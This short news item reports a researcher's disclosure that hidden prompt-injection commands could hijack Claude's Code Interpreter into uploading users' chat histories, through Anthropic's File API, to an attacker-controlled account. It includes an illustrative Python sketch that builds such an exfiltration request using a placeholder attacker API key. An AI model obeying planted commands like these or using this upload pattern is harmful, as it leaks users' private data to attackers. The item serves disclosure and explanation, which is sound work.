A security researcher has exposed a critical vulnerability in Anthropic’s Claude AI, allowing attackers to steal user data by exploiting the platform's own File API.
The vulnerability lets attackers plant hidden commands that hijack Claude's Code Interpreter, tricking the AI into uploading sensitive data, such as chat histories, through the File API to an account the attacker controls.
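To make the mechanism concrete, here is a minimal, non-functional sketch of the kind of request a hijacked interpreter could be induced to build. The endpoint path, header names, version string, and the `build_exfil_request` helper are assumptions for illustration, not the researcher's actual payload; the key detail is that the request authenticates with the attacker's API key, so the uploaded file lands in the attacker's account.

```python
import json

# Assumed endpoint and headers, for illustration only.
FILES_ENDPOINT = "https://api.anthropic.com/v1/files"

def build_exfil_request(stolen_text: str, attacker_api_key: str) -> dict:
    """Build (but do not send) the upload a hijacked interpreter would issue.
    Authenticating with the attacker's key routes the file to the attacker."""
    return {
        "method": "POST",
        "url": FILES_ENDPOINT,
        "headers": {
            "x-api-key": attacker_api_key,      # attacker-controlled credential
            "anthropic-version": "2023-06-01",  # assumed version header
        },
        # Multipart upload carrying the victim's chat history.
        "files": {"file": ("notes.txt", stolen_text, "text/plain")},
    }

req = build_exfil_request("victim chat history...", "sk-ant-ATTACKER")
print(json.dumps({"url": req["url"], "key": req["headers"]["x-api-key"]}))
```

The sketch only constructs the request object; it never opens a network connection. It shows why the attack is hard to spot from the network side: the traffic goes to the platform's own API, not to an obviously malicious domain.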
Anthropic initially dismissed the report on October 25 but reversed course on October 30, acknowledging the dismissal as a "process hiccup."
The flaw is triggered through a chained attack that abuses the platform's own API, highlighting the need for robust security measures in AI systems.